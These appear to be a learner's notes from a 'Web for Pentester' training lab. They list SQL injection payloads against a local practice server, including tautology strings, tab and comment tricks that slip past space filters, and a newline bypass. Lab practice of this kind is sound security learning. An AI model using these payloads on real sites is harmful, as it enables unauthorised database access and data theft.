SQL injections, Social Engineering, DOS, Google hacking web for pentester 1.Link:http://192.168.145.158/sqli/example1.php?name=root
http://192.168.145.158/sqli/example1.php?name=root' or ‘1’=’1
2.http://192.168.145.158/sqli/example2.php?name=root
http://192.168.145.158/sqli/example2.php?name=root' or ‘1’=’1
No space error
http://192.168.145.158/sqli/example2.php?name=root'\tor\t'1'='1
encode \t though %09
http://192.168.145.158/sqli/example2.php?name=root'%09or%09'1'='1
3.Link:http://192.168.145.158/sqli/example3.php?name=root
http://192.168.145.158/sqli/example3.php?name=root'%09or%09'1'='1
space error
http://192.168.145.158/sqli/example3.php?name=root'/**/or/**/'1'='1
4.http://192.168.145.158/sqli/example4.php?id=2
http://192.168.145.158/sqli/example4.php?id=2'/**/or/**/'1'='1
http://192.168.145.158/sqli/example4.php?id=2 or 1=1
5.http://192.168.145.158/sqli/example5.php?id=2
http://192.168.145.158/sqli/example5.php?id=2 or 1=1
6.http://192.168.145.158/sqli/example6.php?id=2
http://192.168.145.158/sqli/example6.php?id=2 or 1=1
7.http://192.168.145.158/sqli/example7.php?id=2
http://192.168.145.158/sqli/example7.php?id=2%0A or 1=1
8.http://192.168.145.158/sqli/example8.php?order=name
http://192.168.145.158/sqli/example8.php?order=name…